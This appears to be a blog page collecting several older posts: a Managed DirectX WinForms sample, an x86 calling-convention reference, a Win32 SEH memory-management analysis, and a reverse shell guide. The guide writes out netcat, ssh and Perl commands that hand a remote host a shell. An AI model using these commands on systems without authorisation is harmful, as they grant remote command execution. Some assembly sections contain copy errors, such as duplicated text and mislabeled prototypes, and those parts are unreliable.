Meditation, The Art of Exploitation

Thinking? At last I have discovered it--thought; this alone is inseparable from me. I am, I exist--that is certain. But for how long? For as long as I am thinking. For it could be, that were I totally to cease from thinking, I should totally cease to exist....I am, then, in the strict sense only a thing that thinks.

Friday, May 26, 2006

Introduction

This article shows how to use .net windows form controls with managed directx content. Most books/tutorials use a winform strictly with MDX content. But people are more interested in using winform controls together with MDX. This question is frequently asked and not well answered. Here I present a small code project using .net 2.0 and visual studio 2005.

Technique

The most important part of this project the directx device creation. Normally it's
device = new Device(0, DeviceType.Hardware, this, CreateFlags.SoftwareVertexProcessing, presentParams);           
'this' is the alias of 'Form' used to represent this winForm.
In order to make .net controls such as menu bar etc to co-exist with directx control, I set up a panel to be used by directx.
private System.Windows.Forms.Panel panel1;
// Initialize panel1
device = new Device(0, DeviceType.Hardware, panel1, CreateFlags.SoftwareVertexProcessing, presentParams);
To demonstrate that this works, I have provided a simple managed directx project with this project that can be downloaded. The complete source code:

using System;
using System.Drawing;
using System.Collections;
using System.ComponentModel;
using System.Windows.Forms;
using System.Data;
using Microsoft.DirectX;
using Microsoft.DirectX.Direct3D;

namespace Chapter1Code
{
///
/// Summary description for Form1.
///

public class Form1 : System.Windows.Forms.Form
{
private Device device = null;
///
/// Required designer variable.
///

private System.ComponentModel.Container components = null;
private Panel panel1;
private MenuStrip menuStrip1;
private ToolStripMenuItem mDXFormWithMenuToolStripMenuItem;
private ToolStripMenuItem exitToolStripMenuItem;
private float angle = 0.0f;

public Form1()
{
//
// Required for Windows Form Designer support
//
InitializeComponent();

this.Size = new Size(800, 600);
this.SetStyle(ControlStyles.AllPaintingInWmPaint | ControlStyles.Opaque, true);
}

///
/// We will initialize our graphics device here
///

public void InitializeGraphics()
{
// Set our presentation parameters
PresentParameters presentParams = new PresentParameters();

presentParams.Windowed = true;
presentParams.SwapEffect = SwapEffect.Discard;

// Create our device
device = new Device(0, DeviceType.Hardware, panel1, CreateFlags.SoftwareVertexProcessing, presentParams);
}

private void SetupCamera()
{
device.RenderState.CullMode = Cull.None;
device.Transform.World = Matrix.RotationAxis(new Vector3(angle / ((float)Math.PI * 2.0f), angle / ((float)Math.PI * 4.0f), angle / ((float)Math.PI * 6.0f)), angle / (float)Math.PI);
angle += 0.1f;

device.Transform.Projection = Matrix.PerspectiveFovLH((float)Math.PI / 4, this.Width / this.Height, 1.0f, 100.0f);
device.Transform.View = Matrix.LookAtLH(new Vector3(0,0, 5.0f), new Vector3(), new Vector3(0,1,0));
device.RenderState.Lighting = true;
}

protected override void OnPaint(System.Windows.Forms.PaintEventArgs e)
{
device.Clear(ClearFlags.Target, System.Drawing.Color.CornflowerBlue, 1.0f, 0);

SetupCamera();

CustomVertex.PositionNormalColored[] verts = new CustomVertex.PositionNormalColored[3];
verts[0].Position = new Vector3(0.0f, 1.0f, 1.0f);
verts[0].Normal = new Vector3(0.0f, 0.0f, -1.0f);
verts[0].Color = System.Drawing.Color.White.ToArgb();
verts[1].Position = new Vector3(-1.0f, -1.0f, 1.0f);
verts[1].Normal = new Vector3(0.0f, 0.0f, -1.0f);
verts[1].Color = System.Drawing.Color.White.ToArgb();
verts[2].Position = new Vector3(1.0f, -1.0f, 1.0f);
verts[2].Normal = new Vector3(0.0f, 0.0f, -1.0f);
verts[2].Color = System.Drawing.Color.White.ToArgb();

device.Lights[0].Type = LightType.Point;
device.Lights[0].Position = new Vector3();
device.Lights[0].Diffuse = System.Drawing.Color.White;
device.Lights[0].Attenuation0 = 0.2f;
device.Lights[0].Range = 10000.0f;

device.Lights[0].Enabled = true;

device.BeginScene();
device.VertexFormat = CustomVertex.PositionNormalColored.Format;
device.DrawUserPrimitives(PrimitiveType.TriangleList, 1, verts);
device.EndScene();

device.Present();

this.Invalidate();
}

///
/// Clean up any resources being used.
///

protected override void Dispose( bool disposing )
{
if( disposing )
{
if (components != null)
{
components.Dispose();
}
}
base.Dispose( disposing );
}

#region Windows Form Designer generated code
///
/// Required method for Designer support - do not modify
/// the contents of this method with the code editor.
///

private void InitializeComponent()
{
this.panel1 = new System.Windows.Forms.Panel();
this.menuStrip1 = new System.Windows.Forms.MenuStrip();
this.mDXFormWithMenuToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.exitToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.menuStrip1.SuspendLayout();
this.SuspendLayout();
//
// panel1
//
this.panel1.Dock = System.Windows.Forms.DockStyle.Fill;
this.panel1.Location = new System.Drawing.Point(0, 24);
this.panel1.Name = "panel1";
this.panel1.Size = new System.Drawing.Size(307, 275);
this.panel1.TabIndex = 0;
//
// menuStrip1
//
this.menuStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.mDXFormWithMenuToolStripMenuItem});
this.menuStrip1.Location = new System.Drawing.Point(0, 0);
this.menuStrip1.Name = "menuStrip1";
this.menuStrip1.Size = new System.Drawing.Size(307, 24);
this.menuStrip1.TabIndex = 1;
this.menuStrip1.Text = "menuStrip1";
//
// mDXFormWithMenuToolStripMenuItem
//
this.mDXFormWithMenuToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.exitToolStripMenuItem});
this.mDXFormWithMenuToolStripMenuItem.Name = "mDXFormWithMenuToolStripMenuItem";
this.mDXFormWithMenuToolStripMenuItem.Size = new System.Drawing.Size(117, 20);
this.mDXFormWithMenuToolStripMenuItem.Text = "MDX form with Menu";
//
// exitToolStripMenuItem
//
this.exitToolStripMenuItem.Name = "exitToolStripMenuItem";
this.exitToolStripMenuItem.Size = new System.Drawing.Size(152, 22);
this.exitToolStripMenuItem.Text = "Exit";
this.exitToolStripMenuItem.Click += new System.EventHandler(this.exitToolStripMenuItem_Click);
//
// Form1
//
this.ClientSize = new System.Drawing.Size(307, 299);
this.Controls.Add(this.panel1);
this.Controls.Add(this.menuStrip1);
this.Name = "Form1";
this.Text = "Form1";
this.menuStrip1.ResumeLayout(false);
this.menuStrip1.PerformLayout();
this.ResumeLayout(false);
this.PerformLayout();

}
#endregion

///
/// The main entry point for the application.
///

static void Main()
{
using (Form1 frm = new Form1())
{
// Show our form and initialize our graphics engine
frm.Show();
frm.InitializeGraphics();
Application.Run(frm);
}
}

private void exitToolStripMenuItem_Click(object sender, EventArgs e)
{
this.Dispose();
}
}
}

Tuesday, May 16, 2006

Reverse Shell Guide

In this little guide I'll quickly cover three very helpful methods to get a reverse shell on a host, using ssh, netcat or Perl. One may ask, why should I need a reverse shell? Let me elaborate on that.

People often have a computer in a personal LAN and use a router to get on the internet. These routers usually are NAT (Network Address Translation) routers, what means, that to the internet the network seems to be just one computer, not a whole network.

From the outside, there is almost no chance to find out how many computers are on the internal network (unless you are used to using hping2). And, even if you know a computer's IP on that network, you still couldn't access it.

The situation looks like follows:

192.168.1.2             \ +--------+
192.168.1.3 \| NAT |
\___ | Router | <---- REQUEST
|192.168.|
___| 1.1 |
192.168.1.4/ +--------+

When a request reaches the router, it doesn't know what to do and silently drops the packet. Connections made from inside of the network go through the router, but the remote host cannot initiate a connection to one of the hosts in the network (unless the router features a port forwarding feature, and that's often hard to configure properly).

But in this situation one could access one of the hosts inside the network using a reverse shell.

Note: From now on I'll refer to the computer you want to run the shell on the remote host and the computer you want to send the commands from your host

Reverse Shell Using SSH

As said above, all connections must be made from inside of the network. That means, if someone wants to connect to one of the hosts inside of the network, the remote host has to establish the connection.

That is done with the following command (executed on the remote host):

ssh -NR 3333:localhost:22 user@yourhost

The R switch tells SSH to open a reverse shell. The N switch tells SSH not to request a shell on the host it's connecting to but to just initiate the connection. 3333 is the port number the SSH connection will be tunneled through on the remote host. This can also be something like 1337, but be sure to choose a number greater than 1024 unless you are root (that's because the previleged ports up to 1024 can exclusively be used by root).

If you are prompted for a password, supply your host's password.

Now there is a connection from the remote host, let's say 192.168.1.2, to your host. On your host SSH opens port 3333 as a gateway to the client 192.168.1.2. You can now issue the following command on your host:

ssh user@localhost -p 3333,
where user is the username to be used on 192.168.1.2.

Voilà, you have a working SSH connection to a computer inside of a NAT network!

Reverse Shell with Netcat

Even on a host that hasn't got an SSH daemon, there is still a way to connect to it.

There is a simple tool called netcat. In the manpage to it is referred as "TCP/IP swiss army knife". With netcat you can send out simple TCP/IP requests and receive the responses.

In addition to that, netcat can also listen on a specific port. It can even execute a program as soon as a client connects. That makes it perfect for opening up a reverse shell:

On your host, you have to listen for an incoming connection (thanks to -v, you'll get a quick note as soon as the shell connects):

netcat -v -l -p 3333

On the remote host, the following command has to be executed in order to establish a connection to your host:

netcat -e /bin/sh yourhost 3333

What these commands do is the following: You first set your netcat to listen for incoming connections and leave it waiting. Then you issue the command on the remote host, which will then connect to your host and—as soon as the connection has been established—will execute a shell.

Again, you have got a reverse shell, though that one is very minimal. You haven't even got a prompt. But still, you can execute commands.

Note: On some systems the program netcat may be called nc instead.

Netcat as a Replacement for SSH (though unencrypted)

If the remote host has no sshd installed (and maybe your host is behind a NAT router), netcat can also be used as a replacement for SSH.

On the remote host, execute a listening netcat that'll start a shell as soon as a client connects:
netcat -v -l -p 3333 -e /bin/sh

On your host, execute the connecting netcat:
netcat remotehost 3333

Reverse Shell with Perl

If there is no netcat installed on the remote machine, you can also try out this very minimal reverse shell written in Perl. It executes every command it receives directly. Because it doesn't run an interactive shell, there is no point in cd'ing to some directory. But you can still do things like echo foo >/tmp/foo.




#!/usr/bin/perl
use Socket;
$addr=sockaddr_in('3333',inet_aton('localhost'));
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
connect(S,$addr);select S;$|=1;
while(defined($l=<s>)){print qx($l);}
close(S);



This little piece of code tries to open a connection to localhost on port 3333. You'll want to change this to your machine, of course. So before you start the reverse shell, listen on port 3333 on your machine using netcat:

netcat -v -l -p 3333

Once you see that the reverse shell has connected you can start executing commands...

© 2005-2006 Julius Plenz

Noteworthy i386 listing of frequently used subroutines and Typical function call protocol

Originally composed on June 13, 2004, editted formatting.


1. String length calculation and key comparison
mov ecx, -1 ; mov ecx, xx (xx=max possible length)
mov al, 0 ;xor eax, eax;sub eax, eax;mov eax, 0
mov edi, string_offset ; lea edi, [ebp+XX]
; ES:EDI -> string
repnz scasb ; repnz scasw
neg ecx ; xor eax, eax
sub eax, ecx
mov edi, real string ; lea edi, [ebp+XX]
mov esi, user string
repnz cmpsb ; repeat till ecx = 0 or [edi]!=[esi]
test ecx, ecx
jnz bad
xor eax, eax ; using eax=0 as good, could also use eax=1 as bad
jmp good
bad:
mov eax, 1
ret
good
do_good_stuff ; update registry, update ini file, update memory
ret

2. A==0? 1:0 translated to assembly
mov eax, A
neg eax ; eax = 0 - eax, unsigned, but sets CF if eax > 0
sbb eax, eax ; eax = eax - eax - CF
inc eax
ret
if A == 0,
neg eax => eax = 0, CF = 0
sbb eax, eax => eax = 0
inc eax => eax = 1
else
neg eax => eax = (UnSigned)-A, CF = 1
sbb eax, eax => eax = -1
inc eax => eax = 0
endif

An alternative form A == 0? 0:1
mov eax, A
cmp eax, 1 ; set CF if eax = 0, CF = 0 if A != 0
sbb eax, eax ; eax = -1 if A = 0, eax = 0 if A != 0
inc eax ; eax = 0 if A = 0, eax = 1 if A != 0
ret

A little bit mind boggling, isn't it? :-)
These are common code signatures you will find in assembly language
generated from high level language (typically C/C++) from a compiler.
A final note, the counterpart of sbb is adc (add with carry). As an

excersise, build A == 0? 1:0 using abc instead of sbb.

3. The __cdecl, __stdcall, __fastcall, thiscall signatures and
__declspec(naked)
(Reference: http://msdn.microsoft.com/library/default.asp?url=/library/en-us/vclang/html/_core___stdcall.asp)

Normally a subroutine written in C/C++ is translated with the following
signatures, take
int sub_a(arg1, arg2, arg3)
call sub_a(arg1, arg2, arg3)

there is 4 ways to declare its prototype that will affect generated
assembly code.

3.1)
__cdecl:
This is the default calling convention for C and C++ programs.
Because the stack is cleaned up by the caller, it can do vararg functions.
The __cdecl calling convention creates larger executables than __stdcall,
because it requires each function call to include stack cleanup code.
The following list shows the implementation of this calling convention.

Element Implementation
Argument-passing order Right to left
Stack-maintenance responsibility Calling function pops the arguments from
the stack Name-decoration convention Underscore character (_) is prefixed to
names Case-translation convention No case translation performed

So what does all this babblying mean when it's in action?
Callee:
int __cdecl sub_a(arg1, arg2, arg3)
push ebp
mov ebp, esp
sub esp, 4 x number_of_local_automatic_variables <-- normally the case
; pointers could complicate it, and structure alignment requirement
; could also make the space required on stack seem strange.
; nevertheless, automatica variables are stored on stack.
; name it NOLAV: # of local automatic variables
arg1 = [ebp+8] ; Here we assume it's a near call (*flat memory model)
arg2 = [ebp+C] ; within the caller's own code segment linear space
arg3 = [ebp+10] ; normally true but not for some trickery code ...
add esp, 4 x NOLAV
; ebp+10 <- arg3 || stack high pop ebp
; ebp+0C <- arg2 || ret
; ebp+8 <- arg1 ||
; ebp+4 <- eip of the return address ||
; ebp <- previous ebp ||
<= esp = ebp pointer \/ stack low

Caller: call sub_a(arg1, arg2, arg3)
push arg3 ; see below
push arg2
push arg1
call sub_a
add esp, 0C

now it's of course simplified because arg3 cannot be directly referrenced in
assembly language. Very often it's something like this:
mov eax, [ebp+XX] ; passed on argument to this subroutine
push eax
or
mov eax, [ebp-XX] ; a LAV: local automatic variable
push eax
push XX ; a direct constant
mov eax, [XXXXXXXX] ; a global variable
push eax

I hope this clears up a lot of confusions around the myth around a subroutine
call in assembly language. Now we briefly describe __stdcall, __fastcall,
and thiscall

3.2) __stdcall: The __stdcall calling convention is used to call Win32 API
functions. The callee cleans the stack, so the compiler makes vararg functions
__cdecl. Functions that use this calling convention require a function prototype.
return-type __stdcall function-name[(argument-list)] The following list shows the
implementation of this calling convention. Element Implementation Argument-passing
order Right to left. Argument-passing convention By value, unless a pointer or
reference type is passed. Stack-maintenance responsibility Called function pops
its own arguments from the stack. Name-decoration convention An underscore (_)
is prefixed to the name. The name is followed by the at sign (@) followed by the
number of bytes (in decimal) in the argument list. Therefore, the function declared
as int func( int a, double b ) is decorated as follows: _func@12 Case-translation
convention None

Callee:
int __stdcall sub_a(arg1, arg2, arg3)
push ebp
mov ebp, esp
sub esp, 4 x number_of_local_automatic_variables <-- normally the case
; pointers could complicate it, and structure alignment requirement
; could also make the space required on stack seem strange.
; nevertheless, automatica variables are stored on stack.
; name it NOLAV: # of local automatic variables
arg1 = [ebp+8] ; Here we assume it's a near call (*flat memory model)
arg2 = [ebp+C] ; within the caller's own code segment linear space
arg3 = [ebp+10] ; normally true but not for some trickery code ...
add esp, 4 x NOLAV ; ebp+10 <- arg3 || stack high
pop ebp ; ebp+0C <- arg2 ||
ret 0C ; ebp+8 <- arg1 ||
; ebp+4 <- eip of the return address ||
; ebp <- previous ebp ||
<= esp = ebp pointer \/ stack low

The difference here is 'ret 0C' instead of 'ret' because in __stdcall the callee
is responsible to clean up the stack.

Caller: call sub_a(arg1, arg2, arg3)
push arg3 ; see below
push arg2
push arg1
call sub_a

Here after call sub_a, the caller code needs not to worry about stack clean up.
There are 2 important points I want to bring up about __stdcall. First, WINAPI
is __stdcall so they use this convention. This is the most frequently encountered
form on a windows platform. Second, __stdcall will mangle the subroutine name
which will cause trouble if you try to link against __stdcall subroutine.
Unless you are working in a consistent setting, try to avoid __stdcall
declaration. 3.3) __fastcall The __fastcall calling convention specifies that
arguments to functions are to be passed in registers, when possible. The following
list shows the implementation of this calling convention. Element Implementation
Argument-passing order The first two DWORD or smaller arguments are passed in ECX
and EDX registers; all other arguments are passed right to left. Stack-maintenance
responsibility Called function pops the arguments from the stack. Name-decoration
convention At sign (@) is prefixed to names; an at sign followed by the number of
bytes (in decimal) in the parameter list is suffixed to names. Case-translation
convention No case translation performed. Callee: int __stdcall sub_a(arg1, arg2,
arg3)

push ebp
mov ebp, esp
sub esp, 4 x NOLAV arg1 = ecx ; Here we assume it's a near call (*flat memory model)
arg2 = edx ; within the caller's own code segment linear space
arg3 = [ebp+8] ; normally true but not for some trickery code ...
add esp, 4 x NOLAV
pop ebp
ret 04 ; ebp+8 <- arg1 ||
; ebp+4 <- eip of the return address ||
; ebp <- previous ebp ||
<= esp = ebp pointer \/ stack low

The difference here is 'ret 04' instead of 'ret' in __cdecl or 'ret 0C' in __stdcall
because in __fastcall passes 2 arguments using registers and the callee is
responsible to clean up the rest of the stack.

Caller:

call sub_a(arg1, arg2, arg3)
push arg3 ; see below
mov edx, arg2
mov ecx, arg1
call sub_a

__fastcall is similar to __stdcall except when callee has less than 3 arguments,
no stack reference is needed for arguments so execution speed is improved. Like
__stdcall, subroutine names are also mangled in library. 3.4) thiscall The
__fastcall calling convention specifies that arguments to functions are to be
passed in registers, when possible. The following list shows the implementation of
this calling convention. Element Implementation Argument-passing order The first
two DWORD or smaller arguments are passed in ECX and EDX registers; all other
arguments are passed right to left. Stack-maintenance responsibility Called
function pops the arguments from the stack. Name-decoration convention At
sign (@) is prefixed to names; an at sign followed by the number of bytes
(in decimal) in the parameter list is suffixed to names. Case-translation
convention No case translation performed.

Callee: int __stdcall sub_a(arg1, arg2, arg3)
push ebp
mov ebp, esp
sub esp, 4 x NOLAV
arg1 = [ebp+10] ; Here we assume it's a near call (*flat memory model)
arg2 = [ebp+0C] ; within the caller's own code segment linear space
arg3 = [ebp+8] ; normally true but not for some trickery code this_pointer = ecx ...
add esp, 4 x NOLAV
pop ebp
ret 0C ; ebp+8 <- arg1 ||
; ebp+4 <- eip of the return address ||
; ebp <- previous ebp ||
<= esp = ebp pointer \/ stack low

Pretty much like __stdcall except that the caller secretly puts the "this" pointer
into ecx before it calls sub_a.

Caller: call sub_a(arg1, arg2, arg3)
push arg3 ; see below
push arg2
push arg1
mov ecx, this_pointer
call sub_a

Pretty much like __stdcall except that the caller secretly puts the "this" pointer
into ecx before it calls sub_a.

3.5) __cdeclspec(naked)
Callee: __cdeclspec(naked) int sub_a(arg1, arg2, arg3){
__asm{
do what ever but don't blow it up!
}
}
Unlike any of the above declaration decorations, this one is special that it
will not setup the base stack frame pointer (ebp) for the callee. The callee
sub_a will normally be written in assembly code and it's entirely upon sub_a to
not blow up anything! The complier trusts that sub_a knows what it is doing. On
the caller side, nothing special needs to be done. Although it's not unusual a
chain of naked subroutines are constructed to achieve some specific goal.

3.6) The default VC behavior when working with .C source code is __cdecl but
without the _ prefix. When working with .CPP source code, the function name is
automatically mangled unless prefixed with extern "C".

__declspec(dllexport) int a(int x, int y, int z){
int b = x+10;
return b+y+z;
}

.text:10001000
public a .text:10001000 a
proc near .text:10001000
.text:10001000 var_4 = dword ptr -4
.text:10001000 arg_0 = dword ptr 8
.text:10001000 arg_4 = dword ptr 0Ch
.text:10001000 arg_8 = dword ptr 10h
.text:10001000
.text:10001000 push ebp
.text:10001001 mov ebp, esp
.text:10001003 push ecx
.text:10001004 mov eax, [ebp+arg_0]
.text:10001007 add eax, 0Ah
.text:1000100A mov [ebp+var_4], eax
.text:1000100D mov eax, [ebp+var_4]
.text:10001010 add eax, [ebp+arg_4]
.text:10001013 add eax, [ebp+arg_8]
.text:10001016 mov esp, ebp
.text:10001018 pop ebp
.text:10001019 retn
.text:10001019 a endp

Table of name generation
.C __declspec(dllexport) int a -> a
.C __declspec(dllexport) int __cdecl a -> a
.C __declspec(dllexport) int __stdcall a -> _a@12
.CPP __declspec(dllexport) int a -> ?a@@YAHHH@Z
.CPP extern "C" __declspec(dllexport) int a -> a
.CPP extern "C" __declspec(dllexport) int __stdcall a -> _a@12

So be careful when you name your files. .C and .CPP produce
drastically different function tables and be sure to know what
you want and name your source code files accordingly.

WIN32 SEH and Memory Management considered harmful (Part 3)

Originally composed on June 3rd, 2004, editted formatting.

Think about this problem again, is there a way to break this dillema between memory allocation constraint and fault handling mechanism. If we could somehow manipulate the register value at the fault address machine instruction, we could change its value to an updated memory address allocated inside of the fault handler

To acheive this, we will have to sacrifice the code portability by directly embedding assembly code into the C source code. Remember the code was like this:


code = (PPATCHCODE)VirtualAlloc(NULL, NR*sizeof(PATCHCODE),
MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
while(_ftscanf(inp, "%X%X%X", &addr, &o_val, &n_val) != EOF){
code[record].addr = addr;
code[record].orig_val = o_val;
code[record].new_val = n_val;
record++;
}


We will use EAX to contain the address that we will write the data into. The design is to then update EAX in the CONTEXT record delivered in the EXCEPTION_RECORD to the fault handler. After the fault handler returns, the CONTEXT record will have a new EAX value. The operating system switches to this new CONTEXT (the context of the process where the EXCEPTION occured) and blindly accepts the new EAX value. Since the new EAX value now contains a valid memory address, the write operation will proceed. Without doing this, we have no way to control what might come out of the simple "code[record].addr = addr;" from the compiler. The new code snippet looks like this:


code = (PPATCHCODE)VirtualAlloc(NULL, NR*sizeof(PATCHCODE),
MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
while(_ftscanf(inp, "%X%X%X", &addr, &_val, &n_val) != EOF){
paddr = code+record;
__asm{
mov eax, paddr;
mov ebx, addr;
mov [eax], ebx; <------- Fault occurs here. mov ecx, dwsize;
mov ebx, o_val;
mov [eax+ecx], ebx;
// The compiler cannot genereate correct code for
// mov [eax+dwsize], ebx
// it's translated to mov [eax+ebp-20], ebx
// we wanted mov [eax+[ebp-20]], ebx
// so just use hardcoded # here, mov [eax+4], ebx
// or use ecx to contain the number
mov ebx, n_val;
mov [eax+ecx*2], ebx
}
record++;
}


We first calculate the memory address of the patchcode record structure (which is padded and aligned on a 16-byte cache line on ia32 platform) by adding the starting address of the patchcode array and the current record number. We then assign this address to EAX, this is the address where the next write operation will access. The patchcode address value is assigned to EBX and then moved to the memory address pointed to by EAX. If we ever access the memory beyond we initially allocated, we will have a memory access violation at this instruction "mov [eax], ebx". After the exception occured, the execution is transfered to the user fault handler through a series of complicated operations, trap gate, kernel fault handler, compiler stud fault handler, and finally user fault handler. We do exactly what is explained in the fault handler, we update the EAX value in the user process CONTEXT record:


tmp_code = (PPATCHCODE)VirtualAlloc(NULL, 2*NR*sizeof(PATCHCODE),
MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
_tcsncpy((_TCHAR *)tmp_code, (_TCHAR *)code, NR*sizeof(PATCHCODE));
VirtualFree(code, 0, MEM_RELEASE);
lpEP->ContextRecord->Eax = (ULONG)(tmp_code+NR);
NR=2*NR;
code = tmp_code;
nFilterResult = EXCEPTION_CONTINUE_EXECUTION;

First we allocate twice large a memory space of the previous size, then copy the content from the previous patchcode array to the new memory space. After we free the previous memory allocated, we update the EAX value in the user process CONTEXT. After some other updates, we return EXCEPTION_CONTINUE_EXECUTION to tell the kernel that this should be the last unwind fault handler and the EXCEPTION has been handled, the execution should now be continued at the exact address where the fault occured. Since now the EAX has the updated memory address, this code surely works.

Although this code works, it's not without sacrifice of code portability and wasted memory allocation and data transfer inside of the memory space. The use of embedded assembly code and CONTEXT structure member prohibits this code to work on other platform other than 32bit intel architecture. The fault handler has to allocates new memory, transfer data from previous memory to new memory, and then free previous memory. It's a waste of memory space and CPU time.

WIN32 SEH and Memory Management considered harmful (Part 2)

Originally composed on May 27, 2004, editted formatting.

We could pretty much exclude direct win32 Virtual Memory management out of the picture now and try to rely on another win32 memory type Heap to make this program work. Now our code looks like this:


except_handler(...){

HeapReAlloc(hhwnd, HEAP_REALLOC_IN_PLACE_ONLY, cur_mem, 2*cur_size);

return EXECUTION_CONTINUE;

if anything is wrong, return EXECUTION_SEARCH;
}

patcher(...){

hhwnd = HeapCreate(0,0,0)
cur_mem = HeapAlloc(hhwnd, initial_size);

__try{
read_data(FILE, tmp_data);
cur_mem[counter]->data = tmp_data;
counter++;
}
__except(except_handler(...)){
do_something;
}
}

Remember that this is just pseudocode skeleton, you must do proper error checking and handling if you are writing real code. It looks nice that we are granted with a HeapReAlloc function to dynamically adjust the allocated block size. However there are two gotchas here.

First, the realloc function is unlikely to conserve the memory content of the previously allocated memory space. Second, this code is simply flatout not working. What's wrong? We have avoided the C-ASM incoherence by reallocating at fixed memory address with the so called HEAP_REALLOC_IN_PLACE_ONLY flag. We also ensure the memory space is large enough. If you debug this code though, you will discover HeapReAlloc will forever return NULL. And you will also notice the exception address is way behond cur_mem+size


|-----------| <- cur_mem | | | | <- cur_mem->size
|-----------|
| |
| |
| |
| | <- Exception happening here | |

The reason of all these is that heap is designed to be a heavy duty memory block and heap manager DOES NOT take care of out of bound memory access. A more detailed Heap structure looks like this:


+-----------+ <- Heap Real Start address
| |
| | <- Heap control structure
|-----------| <- some heap control block (the infamous first_free arena)
| | <- some random block if cur_mem wasn't allocated first
| |
|-----------| <- cur_mem
|header info|
| | <- cur_mem->size
|-----------|
|header info|
| |

Because heap manager does not care about writing beyond block boundary, our code is actually writing way over it's initially allocated memory space and corrupted header info of contigent memory block, thus preventing HeapReAlloc from expanding its size. A simple heap allocation code will reveal that blocks allocated one after another do not have their addresses form a continuous space. Thus when our code triggers the exception, it has already overwritten through its boundary and corrupted the heap. Clearly SEH and Heap memory are mutually exclusive in win32 programming.


Conclusions:

As good an idea as SEH may sound like, in Win32 enviroment, we have demonstrated that SEH will not cooperate Heap memory manage and direct Virtual Memory allocation makes SEH redudent and actually not working. The fact that a single C line of code cannot be guranteed to execute atomically makes SEH debugging very difficult. Same code, may produce different result depending on how it's compiled. The requirement of a fixed base address when working with virtual memory and SEH makes the effort of using SEH seem vain. In conclusion, SEH should be avoided when memory management is invovled, although ironically one of the major reasons for SEH is to handle invalid memory access. Also due to volitile nature of SEH and C interaction, extreme caution should be taken to ensure reproducibile and predicatble program execution.

WIN32 SEH and Memory Management considered harmful (Part 1)

Originally composed on May 27, 2004, editted formatting.

It so happens that I need to write a small utility program to do some win32 EXE file patching business, actually in this case 2 files--one to generate a patch between two slightly different binary files and one to aplly the patch to a fresh binary file. The first program, MakePatch is relatively easy to cook up. However, the 2nd program Patcher requires some special coding technique to be perfect (as we'll see very soon, the win32 system has made it rather impossible).


The Patcher program first open the patch code text file, which looks like this:

offset origin_byte new_byte
...

each line of the patch code consists of an offset in the binary file to patch, the original byte code to be patched with the new byte code. Since we have no fore-knowledge how many patch lines we have in the patch code file, the program should dynamically adjust the size of the memory that hold these patch codes as they are read into the memory.


At a first glance, what could better suit this task with win32's shiny virtual memory management and structured exception handling (SEH) code. The design is simple,


except_handler(...){

new_mem=VirtualAlloc(2*cur_size);
copy_mem(cur_mem, new_mem, cur_size);

VirtualFree(cur_mem);
cur_mem = new_mem;

return EXECUTION_CONTINUE;

if anything is wrong, return EXECUTION_SEARCH;
}

patcher(...){

cur_mem = VirtualAlloc(initial_size);

__try{
read_data(FILE, cur_mem[counter]->data);
counter++;
}
__except(except_handler(...)){
do_something;
}
}


Naturally this code doesn't work. What a surprise. Well then, let's try to debug the code and see what's wrong. Again, you are hitting your head against the wall, the MS studio 6.0 just hangs after the memory violation and wouldn't jump to the exception handler subroutine. Now you have two choice if you cannot debug in assembler code, 1) try to figure out what's wrong by playing with the code; 2) give up! Because if your debuger of choice cannot correctly follow the logic of execution (in the settings of exception handling where things only trully reveal at assembler level), there is not much chance you could make it work.


So now off we go to debug this code in SIce, VirtualAlloc seems to be a natural choice to set a breakpoint on. After much tracing, it's observed that the code failed because of this: a single line of c code is often compiled into 4-5 lines of machine code and the exception can only happen and resume at a single machine instruct line, NOT the c code line! To make it easier to debug this code, I rewrote the patcher subroutine to this


patcher(...){

cur_mem = VirtualAlloc(initial_size);

__try{
read_data(FILE, tmp_data);
cur_mem[counter]->data = tmp_data;
counter++;
}
__except(except_handler(...)){
do_something;
}
}

since tmp_data is an automatic (on stack) variable and is guranteed to be accessible, the exception now occurs not in the convoluted read_data subroutine be it win32 or libc. The exception now occurs at line:


cur_mem->data = tmp_data;

which is translated to machine code like this:

mov eax, [ebp-20] ; $tmp_data
mov ecx, [0040xxxx] ; $cur_mem
mov edx, [ebp-24] ; counter
mov [ecx+edx], eax ; $cur_mem[counter]->data = $tmp_data

So in this hyperthetical case, the single c line code is translated into 4 machine instructions. And really the exception (memory access violation) occurs at the last line of the instruction,


mov [ecx+ebx], eax

Now imagine for a second, why is this a problem?

The problem is that when the exception handler allocates the new space, new_mem is a pointer pointing to a different memory location, not what cur_mem is refering too. So in other words, even though we allocated new memory space and instructed the processor to try the last instruction that generated the exception, we are still doomed to fail because the instruction is hardcoded with the values it contains. The registers are not updaing their contents to reflect the fact that we are now moving to a new memory location completely. To be more specific, consider the following scenario,


mov eax, [ebp-20] ; $tmp_data =0x00 00 00 05
mov ecx, [0040xxxx] ; $cur_mem =0x03 00 00 00
mov edx, [ebp-24] ; counter =0x00 00 10 00 4k page boundary
mov [ecx+edx], eax ; $cur_mem[counter]->data = $tmp_data

ecx+edx = 0300 1000, since these general purpose registers will have their values restored when the interrupt handler returns from the fault handler (trap gate in LDT), mov [ecx+edx], eax will be trying to do the same memory access and generates a double fault. What we really wanted is in the c code cur_mem->data = tmp_data, the cur_mem is a new value now and we are accessing our shining new memory space. Now because of the fact that a single c code line is not an atomic execution (compiled into multiple machine instructions), our program cannot run properly and we have no way to control the register values in ecx and edx upon returning from the exception handler.


How do we remedy this problem? We must gurantee that upon returning from the exception handler, ecx+edx is pointing to a valid read/write memory space. It'd be handy if there was VirtualReAlloc, but there is no such a function documented in MSDN. Another approach would be to allocate some memory somewhere else to save the current memory, then free cur_mem and VirtualAlloc with fixed base memory address and double the cur_mem_size.


|-----------| <- cur_mem | | | | <- cur_mem->size
|-----------|
| |
| |
|-----------| <- tmp_mem | | | | |-----------|

In order to be able to allocate double*$cur_mem->size, you have to make sure the temporary memory space start from at least $cur_mem+double*$cur_mem->size as shown in the graphy. A box indicates cur_mem->size amount of memory. If you fail to satisfy the above condition, you will not be able to VirtualAlloc at fixed $cur_mem address with double its current size. This approach is definitely doble but the master Jedi programmer will no doubt frown on its design and efficiency. The exception handler is simply too expensive and is against its design principle to be efficient and decisive.


